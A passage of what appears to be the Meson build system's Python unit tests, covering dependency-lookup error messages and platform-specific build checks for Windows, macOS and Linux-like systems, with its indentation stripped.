self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
a error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. A wrap file from a subproject is used but fails because it does not
contain required keys.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Neither a subproject directory nor a .*nosubproj.wrap.* file was found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'Dependency .*somenotfounddep.* from subproject .*subprojects/somesubproj.* found: .*NO.*')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
self.assertRegex(out, r'Missing key .*source_filename.* in subsubproject.wrap')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
@mock.patch.dict(os.environ)
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd.exe with args without searching
prog = ExternalProgram('cmd', command=['cmd', '/C'])
self.assertTrue(prog.found(), msg='cmd not found with args')
self.assertPathEqual(prog.get_command()[0], 'cmd')
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# If `.PY` is in PATHEXT, scripts can be found as programs
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
# Finding a script in PATH w/o extension works and adds the interpreter
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script with an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script-ext.py', command=[os.path.join(testdir, 'test-script-ext.py'), '--help'])
self.assertTrue(prog.found(), msg='test-script-ext.py with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script without an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script', command=[os.path.join(testdir, 'test-script'), '--help'])
self.assertTrue(prog.found(), msg='test-script with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# To force people to update this test, and also test
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--buildtype=release'])
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
def test_compiler_checks_vscrt(self):
'''
Test that the correct VS CRT is used when running compiler checks
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
def sanitycheck_vscrt(vscrt):
checks = self.get_meson_log_sanitychecks()
self.assertTrue(len(checks) > 0)
for check in checks:
self.assertIn(vscrt, check)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=release'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=md'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mt'])
sanitycheck_vscrt('/MT')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mtd'])
sanitycheck_vscrt('/MTd')
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
@mock.patch.dict(os.environ)
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
self.assertEqual(libhello_nolib.get_pkgconfig_variable('foo', {}), 'bar')
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourself.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
